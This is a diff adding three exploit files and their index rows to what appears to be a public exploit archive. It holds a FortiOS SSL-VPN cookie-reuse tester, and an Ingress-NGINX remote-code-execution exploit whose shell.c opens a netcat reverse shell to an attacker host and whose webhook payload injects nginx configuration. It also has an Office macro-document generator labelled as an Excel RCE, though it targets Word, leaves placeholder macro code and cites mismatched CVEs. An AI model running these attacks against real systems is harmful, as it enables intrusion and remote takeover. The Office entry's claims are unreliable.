diff --git a/exploits/multiple/remote/52336.py b/exploits/multiple/remote/52336.py new file mode 100755 index 000000000..5f76f92c1 --- /dev/null +++ b/exploits/multiple/remote/52336.py @@ -0,0 +1,312 @@ +#!/usr/bin/env python3 +""" +# Exploit Title: FortiOS SSL-VPN 7.4.4 - Insufficient Session Expiration & Cookie Reuse +# Date: 2025-06-15 +# Exploit Author: Shahid Parvez Hakim (BugB Technologies) +# Vendor Homepage: https://www.fortinet.com +# Software Link: https://www.fortinet.com/products/secure-sd-wan/fortigate +# Version: FortiOS 7.6.0, 7.4.0-7.4.7, 7.2.0-7.2.10, 7.0.x (all), 6.4.x (all) +# Tested on: FortiOS 7.4.x, 7.2.x +# CVE: CVE-2024-50562 +# CVSS: 4.4 (Medium) +# Category: Session Management +# CWE: CWE-613 (Insufficient Session Expiration) + +Description: +An insufficient session expiration vulnerability in FortiOS SSL-VPN allows an attacker +to reuse stale session cookies after logout, potentially leading to unauthorized access. +The SVPNTMPCOOKIE remains valid even after the primary SVPNCOOKIE is invalidated during logout. + +References: +- https://fortiguard.com/psirt/FG-IR-24-339 +- https://nvd.nist.gov/vuln/detail/CVE-2024-50562 + +Usage: +python3 fortinet_cve_2024_50562.py -t -u -p [options] + +Example: +python3 fortinet_cve_2024_50562.py -t 192.168.1.10:443 -u testuser -p testpass +python3 fortinet_cve_2024_50562.py -t 10.0.0.1:4433 -u admin -p password123 --realm users +""" + +import argparse +import requests +import urllib3 +import re +import sys +from urllib.parse import urlparse + +# Disable SSL warnings for testing +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +class FortinetExploit: + def __init__(self, target, username, password, realm="", timeout=10, force=False): + self.target = target + self.username = username + self.password = password + self.realm = realm + self.timeout = timeout + self.force = force + self.base_url = f"https://{target}" + self.session = None + + def banner(self): + """Display exploit banner""" + print("=" * 70) + print("CVE-2024-50562 - Fortinet SSL-VPN Session Management Bypass") + print("Author: Shahid Parvez Hakim (BugB Technologies)") + print("CVSS: 4.4 (Medium) | FG-IR-24-339") + print("=" * 70) + print(f"Target: {self.target}") + print(f"User: {self.username}") + print("-" * 70) + + def validate_target(self): + """Check if target is reachable and is Fortinet SSL-VPN""" + try: + print("[*] Validating target...") + response = requests.get(f"{self.base_url}/remote/login", + verify=False, timeout=self.timeout) + + # More flexible detection for Fortinet SSL-VPN + fortinet_indicators = [ + "fortinet", "fortigate", "forticlient", + "sslvpn", "/remote/login", "SVPNCOOKIE", + "logincheck", "hostcheck_install", + "fgt_lang", "realm" + ] + + response_text = response.text.lower() + detected_indicators = [indicator for indicator in fortinet_indicators + if indicator in response_text] + + if detected_indicators: + print(f"[+] Target confirmed as Fortinet SSL-VPN (indicators: {', '.join(detected_indicators[:3])})") + return True + elif response.status_code == 200: + print("[!] Target reachable but Fortinet detection uncertain - proceeding anyway") + return True + else: + print("[-] Target does not appear to be Fortinet SSL-VPN") + return False + + except requests.exceptions.RequestException as e: + print(f"[-] Connection failed: {e}") + return False + + def attempt_login(self): + """Attempt to authenticate with provided credentials""" + try: + print("[*] Attempting authentication...") + + self.session = requests.Session() + self.session.verify = False + + # Get login page first + self.session.get(f"{self.base_url}/remote/login?lang=en", timeout=self.timeout) + + # Attempt login + login_data = { + "ajax": "1", + "username": self.username, + "realm": self.realm, + "credential": self.password + } + + headers = {"Content-Type": "application/x-www-form-urlencoded"} + + response = self.session.post(f"{self.base_url}/remote/logincheck", + data=login_data, headers=headers, + timeout=self.timeout) + + # Check if login was successful + if re.search(r"\bret=1\b", response.text) and "/remote/hostcheck_install" in response.text: + print("[+] Authentication successful!") + + # Extract and display cookies + cookies = requests.utils.dict_from_cookiejar(response.cookies) + self.display_cookies(cookies, "Login") + + return True, cookies + else: + print("[-] Authentication failed!") + print(f"[!] Server response: {response.text[:100]}...") + return False, {} + + except requests.exceptions.RequestException as e: + print(f"[-] Login request failed: {e}") + return False, {} + + def perform_logout(self): + """Perform logout and check cookie invalidation""" + try: + print("[*] Performing logout...") + + response = self.session.get(f"{self.base_url}/remote/logout", timeout=self.timeout) + cookies_after_logout = requests.utils.dict_from_cookiejar(response.cookies) + + print("[+] Logout completed") + self.display_cookies(cookies_after_logout, "Logout") + + return cookies_after_logout + + except requests.exceptions.RequestException as e: + print(f"[-] Logout request failed: {e}") + return {} + + def test_session_reuse(self, original_cookies): + """Test if old session cookies still work after logout""" + try: + print("[*] Testing session cookie reuse...") + + # Create new session to simulate attacker + exploit_session = requests.Session() + exploit_session.verify = False + + # Use original login cookies + exploit_session.cookies.update(original_cookies) + + # Try to access protected resource + test_url = f"{self.base_url}/sslvpn/portal.html" + response = exploit_session.get(test_url, timeout=self.timeout) + + # Check if we're still authenticated + if self.is_authenticated_response(response.text): + print("[!] VULNERABILITY CONFIRMED!") + print("[!] Session cookies remain valid after logout") + print("[!] CVE-2024-50562 affects this system") + return True + else: + print("[+] Session properly invalidated") + print("[+] System appears to be patched") + return False + + except requests.exceptions.RequestException as e: + print(f"[-] Session reuse test failed: {e}") + return False + + def is_authenticated_response(self, response_body): + """Check if response indicates authenticated access""" + # If response contains login form elements, user is not authenticated + if re.search(r"/remote/login|name=[\"']username[\"']", response_body, re.I): + return False + return True + + def display_cookies(self, cookies, context): + """Display cookies in a formatted way""" + if cookies: + print(f"[*] Cookies after {context}:") + for name, value in cookies.items(): + # Truncate long values for display + display_value = value[:20] + "..." if len(value) > 20 else value + print(f" {name} = {display_value}") + + # Highlight important cookies for CVE + if name == "SVPNTMPCOOKIE": + print(f" [!] Found SVPNTMPCOOKIE - Target for CVE-2024-50562") + elif name == "SVPNCOOKIE": + print(f" [*] Found SVPNCOOKIE - Primary session cookie") + else: + print(f"[*] No cookies set after {context}") + + def exploit(self): + """Main exploit routine""" + self.banner() + + # Step 1: Validate target (unless forced to skip) + if not self.force: + if not self.validate_target(): + print("[!] Use --force to skip target validation and proceed anyway") + return False + else: + print("[*] Skipping target validation (--force enabled)") + + # Step 2: Attempt login + login_success, login_cookies = self.attempt_login() + if not login_success: + return False + + # Step 3: Perform logout + logout_cookies = self.perform_logout() + + # Step 4: Test session reuse + vulnerable = self.test_session_reuse(login_cookies) + + # Step 5: Display results + print("\n" + "=" * 70) + print("EXPLOIT RESULTS") + print("=" * 70) + + if vulnerable: + print("STATUS: VULNERABLE") + print("CVE-2024-50562: CONFIRMED") + print("SEVERITY: Medium (CVSS 4.4)") + print("\nRECOMMENDATIONS:") + print("- Upgrade to patched FortiOS version") + print("- FortiOS 7.6.x: Upgrade to 7.6.1+") + print("- FortiOS 7.4.x: Upgrade to 7.4.8+") + print("- FortiOS 7.2.x: Upgrade to 7.2.11+") + print("- FortiOS 7.0.x/6.4.x: Migrate to supported version") + else: + print("STATUS: NOT VULNERABLE") + print("CVE-2024-50562: NOT AFFECTED") + print("\nSystem appears to be patched or not vulnerable") + + return vulnerable + +def parse_target(target_string): + """Parse target string and extract host:port""" + if ':' not in target_string: + # Default HTTPS port if not specified + return f"{target_string}:443" + return target_string + +def main(): + parser = argparse.ArgumentParser( + description="CVE-2024-50562 - Fortinet SSL-VPN Session Management Bypass Exploit", + formatter_class=argparse.RawDescriptionHelpFormatter, + epilog=""" +Examples: + python3 %(prog)s -t 192.168.1.10:443 -u admin -p password + python3 %(prog)s -t 10.0.0.1:4433 -u testuser -p test123 --realm employees + python3 %(prog)s -t vpn.company.com -u user@domain.com -p pass --timeout 15 + python3 %(prog)s -t 192.168.1.10:443 -u admin -p password --force + """ + ) + + parser.add_argument('-t', '--target', required=True, + help='Target IP:PORT (e.g., 192.168.1.10:443)') + parser.add_argument('-u', '--username', required=True, + help='Username for authentication') + parser.add_argument('-p', '--password', required=True, + help='Password for authentication') + parser.add_argument('--realm', default='', + help='Authentication realm (optional)') + parser.add_argument('--timeout', type=int, default=10, + help='Request timeout in seconds (default: 10)') + parser.add_argument('--force', action='store_true', + help='Skip target validation and proceed anyway') + + args = parser.parse_args() + + # Parse and validate target + target = parse_target(args.target) + + try: + # Initialize and run exploit + exploit = FortinetExploit(target, args.username, args.password, + args.realm, args.timeout, args.force) + vulnerable = exploit.exploit() + + # Exit with appropriate code + sys.exit(0 if vulnerable else 1) + + except KeyboardInterrupt: + print("\n[!] Exploit interrupted by user") + sys.exit(1) + except Exception as e: + print(f"[!] Unexpected error: {e}") + sys.exit(1) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/remote/52338.txt b/exploits/multiple/remote/52338.txt new file mode 100644 index 000000000..78f8f4f1b --- /dev/null +++ b/exploits/multiple/remote/52338.txt @@ -0,0 +1,173 @@ +# Exploit Title: Ingress-NGINX 4.11.0 - Remote Code Execution (RCE) +# Google Dork: N/A +# Date: 2025-06-19 +# Exploit Author: Likhith Appalaneni +# Vendor Homepage: https://kubernetes.github.io/ingress-nginx/ +# Software Link: https://github.com/kubernetes/ingress-nginx +# Version: ingress-nginx v4.11.0 on Kubernetes v1.29.0 (Minikube) +# Tested on: Ubuntu 24.04, Minikube vLatest, Docker vLatest +# CVE : CVE-2025-1974 + +1) Update the attacker ip and listening port in shell.c and Compile the shell payload: +gcc -fPIC -shared -o shell.so shell.c + +2) Run the exploit: +python3 exploit.py + +The exploit sends a crafted AdmissionRequest to the vulnerable Ingress-NGINX webhook and loads the shell.so to achieve code execution. + +<---> shell.c <---> + +#include +__attribute__((constructor)) void init() { + system("sh -c 'nc attacker-ip attacker-port -e /bin/sh'"); +} + +<---> shell.c <---> +<---> exploit.py <---> + +import json +import requests +import threading +import time +import urllib3 +import socket +import argparse + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +def upload_shell_via_socket(file_path, target_host, target_port): + print("[*] Uploading shell.so via raw socket to keep FD open...") + try: + with open(file_path, "rb") as f: + data = f.read() + data += b"\x00" * (16384 - len(data) % 16384) + content_len = len(data) + 2024 + + payload = f"POST /fake/addr HTTP/1.1\r\nHost: {target_host}:{target_port}\r\nContent-Type: application/octet-stream\r\nContent-Length: {content_len}\r\n\r\n".encode("ascii") + data + + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((target_host, target_port)) + sock.sendall(payload) + print("[*] Payload sent, holding connection open for 220s...") + time.sleep(220) + sock.close() + except Exception as e: + print(f"[!] Upload failed: {e}") + +def build_payload(pid, fd): + annotation = "http://x/#;" + ("}" * 3) + f"\nssl_engine /proc/{pid}/fd/{fd};\n#" + return { + "kind": "AdmissionReview", + "apiVersion": "admission.k8s.io/v1", + "request": { + "uid": "exploit-uid", + "kind": { + "group": "networking.k8s.io", + "version": "v1", + "kind": "Ingress" + }, + "resource": { + "group": "networking.k8s.io", + "version": "v1", + "resource": "ingresses" + }, + "requestKind": { + "group": "networking.k8s.io", + "version": "v1", + "kind": "Ingress" + }, + "requestResource": { + "group": "networking.k8s.io", + "version": "v1", + "resource": "ingresses" + }, + "name": "example-ingress", + "operation": "CREATE", + "userInfo": { + "username": "kube-review", + "uid": "d9c6bf40-e0e6-4cd9-a9f4-b6966020ed3d" + }, + "object": { + "kind": "Ingress", + "apiVersion": "networking.k8s.io/v1", + "metadata": { + "name": "example-ingress", + "annotations": { + "nginx.ingress.kubernetes.io/auth-url": annotation + } + }, + "spec": { + "ingressClassName": "nginx", + "rules": [ + { + "host": "hello-world.com", + "http": { + "paths": [ + { + "path": "/", + "pathType": "Prefix", + "backend": { + "service": { + "name": "web", + "port": { "number": 8080 } + } + } + } + ] + } + } + ] + } + }, + "oldObject": None, + "dryRun": False, + "options": { + "kind": "CreateOptions", + "apiVersion": "meta.k8s.io/v1" + } + } + } + +def send_requests(admission_url, pid_range, fd_range): + for pid in range(pid_range[0], pid_range[1]): + for fd in range(fd_range[0], fd_range[1]): + print(f"Trying /proc/{pid}/fd/{fd}") + payload = build_payload(pid, fd) + try: + resp = requests.post( + f"{admission_url}/networking/v1/ingresses", + headers={"Content-Type": "application/json"}, + data=json.dumps(payload), + verify=False, + timeout=5 + ) + result = resp.json() + msg = result.get("response", {}).get("status", {}).get("message", "") + if "No such file" in msg or "Permission denied" in msg: + continue + print(f"[+] Interesting response at /proc/{pid}/fd/{fd}:\n{msg}") + except Exception as e: + print(f"[-] Error: {e}") + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="Exploit CVE-2025-1974") + parser.add_argument("--upload-url", required=True, help="Upload URL (e.g., http://127.0.0.1:8080)") + parser.add_argument("--admission-url", required=True, help="Admission controller URL (e.g., https://127.0.0.1:8443)") + parser.add_argument("--shell", default="shell.so", help="Path to shell.so file") + parser.add_argument("--pid-start", type=int, default=26) + parser.add_argument("--pid-end", type=int, default=30) + parser.add_argument("--fd-start", type=int, default=1) + parser.add_argument("--fd-end", type=int, default=100) + args = parser.parse_args() + + host = args.upload_url.split("://")[-1].split(":")[0] + port = int(args.upload_url.split(":")[-1]) + + upload_thread = threading.Thread(target=upload_shell_via_socket, args=(args.shell, host, port)) + upload_thread.start() + time.sleep(3) + send_requests(args.admission_url, (args.pid_start, args.pid_end), (args.fd_start, args.fd_end)) + upload_thread.join() + +<---> exploit.py <---> \ No newline at end of file diff --git a/exploits/windows/local/52337.py b/exploits/windows/local/52337.py new file mode 100755 index 000000000..7c9e1608e --- /dev/null +++ b/exploits/windows/local/52337.py @@ -0,0 +1,151 @@ +# Titles: Microsoft Excel LTSC 2024 - Remote Code Execution (RCE) +# Author: nu11secur1ty +# Date: 06/16/2025 +# Vendor: Microsoft +# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af +# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27751 +# CVE-2025-47957 +# Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise + +## Description: +The attacker can trick any user into opening and executing their code by +sending a malicious DOCX file via email or a streaming server. After the +execution of the victim, his machine can be infected or even worse than +ever; this could be the end of his Windows machine! WARNING: AMPOTATE THE +MACROS OPTIONS FROM YOUR OFFICE 365!!! + +STATUS: HIGH-CRITICAL Vulnerability + + +[+]Exploit: + +``` +#!/usr/bin/python +# CVE-2025-47957 by nu11secur1ty +import os +import time +import zipfile +import threading +import http.server +import socket +import socketserver +import win32com.client + +def get_local_ip(): + """Get the LAN IP address of the current machine.""" + try: + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect(("8.8.8.8", 80)) # External DNS, just for routing + ip = s.getsockname()[0] + s.close() + return ip + except: + return "127.0.0.1" + +def create_docm_with_auto_macro(filename): + script_dir = os.path.dirname(os.path.abspath(__file__)) + full_path = os.path.join(script_dir, filename) + + word = win32com.client.Dispatch("Word.Application") + word.Visible = False + doc = word.Documents.Add() + + doc.Content.Text = "This document contains an auto-starting macro." + + vbproject = doc.VBProject + vbcomponent = vbproject.VBComponents.Add(1) # Standard Module + + macro_code = ''' +Sub AutoOpen() + Call YOUR_PoC +End Sub + +Sub YOUR_PoC() + Dim Program As String + Dim TaskID As Double + On Error Resume Next + Program = "YOUR_EXPLOIT_HERE" + TaskID = YOUR_TASK_HERE + If Err <> 0 Then + MsgBox "Can't start " & Program + End If +End Sub +''' + vbcomponent.CodeModule.AddFromString(macro_code) + + wdFormatXMLDocumentMacroEnabled = 13 + doc.SaveAs(full_path, FileFormat=wdFormatXMLDocumentMacroEnabled) + doc.Close() + word.Quit() + + print(f"[+] Macro-enabled .docm saved at: {full_path}") + return full_path + +def compress_to_zip(filepath): + zip_path = filepath + '.zip' + with zipfile.ZipFile(zip_path, 'w') as zipf: + zipf.write(filepath, arcname=os.path.basename(filepath)) + print(f"[+] Compressed to ZIP: {zip_path}") + return zip_path + +def start_http_server(directory, port=8000): + os.chdir(directory) + handler = http.server.SimpleHTTPRequestHandler + httpd = socketserver.TCPServer(("", port), handler) + ip = get_local_ip() + print(f"[+] HTTP server running at: http://{ip}:{port}/") + + thread = threading.Thread(target=httpd.serve_forever) + thread.daemon = True + thread.start() + return httpd + +if __name__ == "__main__": + filename = "CVE-2025-47957.docm" + docm_path = create_docm_with_auto_macro(filename) + zip_path = compress_to_zip(docm_path) + server = start_http_server(os.path.dirname(docm_path)) + + try: + print("[*] Server running — press Ctrl+C to stop...") + while True: + time.sleep(1) + except KeyboardInterrupt: + print("\n[!] Ctrl+C detected — shutting down server...") + server.shutdown() + print("[+] The Exploit Server stopped. Goodbye!") + +``` + +# Reproduce: +[href](https://www.youtube.com/watch?v=r4NsGrO56yo) + +# Buy an exploit only: +[href](https://satoshidisk.com/pay/COeJqt) + +# Time spent: +01:37:00 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + +-- + +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstorm.news/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 0d466b2e0..da9e4be73 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10943,6 +10943,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 28210,exploits/multiple/remote/28210.txt,"FLV Players 8 - 'popup.php?url' Cross-Site Scripting",2006-07-12,xzerox,remote,multiple,,2006-07-12,2013-09-11,1,CVE-2006-3624;OSVDB-28644,,,,,https://www.securityfocus.com/bid/18954/info 36013,exploits/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,remote,multiple,,2011-08-03,2015-02-07,1,,,,,,https://www.securityfocus.com/bid/48982/info 39222,exploits/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",remote,multiple,,2014-06-05,2016-01-11,1,CVE-2014-0007;OSVDB-108277,,,,,https://www.securityfocus.com/bid/68117/info +52336,exploits/multiple/remote/52336.py,"FortiOS SSL-VPN 7.4.4 - Insufficient Session Expiration & Cookie Reuse",2025-06-20,"Shahid Hakim",remote,multiple,,2025-06-20,2025-06-20,0,CVE-2024-50562,,,,, 52308,exploits/multiple/remote/52308.py,"Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-0204,,,,, 52323,exploits/multiple/remote/52323.txt,"Freefloat FTP Server 1.0 - Remote Buffer Overflow",2025-06-13,"Fernando Mengali",remote,multiple,,2025-06-13,2025-06-13,0,CVE-2025-5548,,,,, 23707,exploits/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",remote,multiple,,2004-02-16,2012-12-31,1,CVE-2004-0290;OSVDB-3982,,,,,https://www.securityfocus.com/bid/9671/info @@ -11089,6 +11090,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 52142,exploits/multiple/remote/52142.py,"InfluxDB OSS 2.7.11 - Operator Token Privilege Escalation",2025-04-08,"Andrea Pasin",remote,multiple,,2025-04-08,2025-04-08,0,CVE-2024-30896,,,,, 30973,exploits/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 - '.swf' Flash File Remote Code Execution",2008-01-02,"Rich Cannings",remote,multiple,,2008-01-02,2014-01-16,1,CVE-2008-6060;OSVDB-56437,,,,,https://www.securityfocus.com/bid/27109/info 21942,exploits/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash",2002-10-15,"Brian Enigma",remote,multiple,,2002-10-15,2012-10-13,1,CVE-2002-1910;OSVDB-59780,,,,,https://www.securityfocus.com/bid/5970/info +52338,exploits/multiple/remote/52338.txt,"Ingress-NGINX 4.11.0 - Remote Code Execution (RCE)",2025-06-20,"Likhith Appalaneni",remote,multiple,,2025-06-20,2025-06-20,1,CVE-2025-1974,,,,, 20468,exploits/multiple/remote/20468.txt,"Inktomi Search Software 3.0 - Information Disclosure",2000-12-05,"china nsl",remote,multiple,,2000-12-05,2012-08-13,1,OSVDB-88577,,,,,https://www.securityfocus.com/bid/2062/info 20467,exploits/multiple/remote/20467.txt,"Inktomi Search Software 3.0 - Source Disclosure",2000-12-05,"china nsl",remote,multiple,,2000-12-05,2012-08-13,1,OSVDB-88576,,,,,https://www.securityfocus.com/bid/2061/info 43385,exploits/multiple/remote/43385.py,"Intel Active Management Technology - System Privileges",2017-05-10,nixawk,remote,multiple,16992,2017-12-21,2018-01-08,0,CVE-2017-5689,,,,,https://github.com/nixawk/labs/tree/d7e879222d058f8b87b7681342834470ab4ba536/CVE-2017-5689 @@ -41056,6 +41058,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 1958,exploits/windows/local/1958.pl,"Microsoft Excel 2003 - Hlink Stack Buffer Overflow (SEH)",2006-06-27,FistFuXXer,local,windows,,2006-06-26,,1,,,,,, 18087,exploits/windows/local/18087.rb,"Microsoft Excel 2007 - '.xlb' Local Buffer Overflow (MS11-021) (Metasploit)",2011-11-05,Metasploit,local,windows,,2011-11-07,2011-11-07,1,CVE-2011-0105;OSVDB-71765;MS11-021,"Metasploit Framework (MSF)",,,,http://www.zerodayinitiative.com/advisories/ZDI-11-121/ 18067,exploits/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite (MS11-021)",2011-11-02,Abysssec,local,windows,,2011-11-02,2011-11-02,1,MS11-021,,,,, +52337,exploits/windows/local/52337.py,"Microsoft Excel LTSC 2024 - Remote Code Execution (RCE)",2025-06-20,nu11secur1ty,local,windows,,2025-06-20,2025-06-20,0,CVE-2025-47957,,,,, 40860,exploits/windows/local/40860.txt,"Microsoft Excel Starter 2010 - XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows,,2016-12-04,2016-12-04,0,,,,,, 52332,exploits/windows/local/52332.txt,"Microsoft Excel Use After Free - Local Code Execution",2025-06-15,nu11secur1ty,local,windows,,2025-06-15,2025-06-15,0,CVE-2025-27751,,,,, 50868,exploits/windows/local/50868.txt,"Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path",2022-04-19,"Antonio Cuomo",local,windows,,2022-04-19,2022-04-19,0,,,,,,